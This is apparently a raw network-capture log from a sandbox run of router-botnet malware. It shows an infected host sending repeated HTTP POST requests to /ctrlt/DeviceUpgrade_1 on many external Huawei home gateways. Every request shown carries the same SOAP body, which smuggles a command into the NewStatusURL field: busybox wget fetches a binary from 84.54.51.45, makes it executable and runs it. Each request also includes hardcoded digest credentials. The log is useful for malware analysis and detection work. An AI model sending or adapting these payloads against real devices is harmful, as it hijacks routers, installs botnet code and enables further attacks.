68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            976192.168.2.155852041.102.143.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746841908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            977192.168.2.154272641.89.179.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746845961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            978192.168.2.154758441.20.152.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746850014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            979192.168.2.153820041.128.201.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746926069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            980192.168.2.154323441.182.225.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746926069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            981192.168.2.154903441.148.230.237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746946096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            982192.168.2.155585441.225.47.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.747031927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            983192.168.2.154429041.68.143.1137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.747051954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            984192.168.2.155056241.97.78.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.747055054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            985192.168.2.153950841.85.21.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.747077942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            986192.168.2.156090041.96.5.17837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.747086048 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
